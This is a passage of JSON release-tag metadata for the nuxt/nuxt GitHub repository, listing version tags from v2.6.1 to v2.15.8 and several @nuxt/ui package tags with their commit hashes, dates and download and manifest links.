-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"}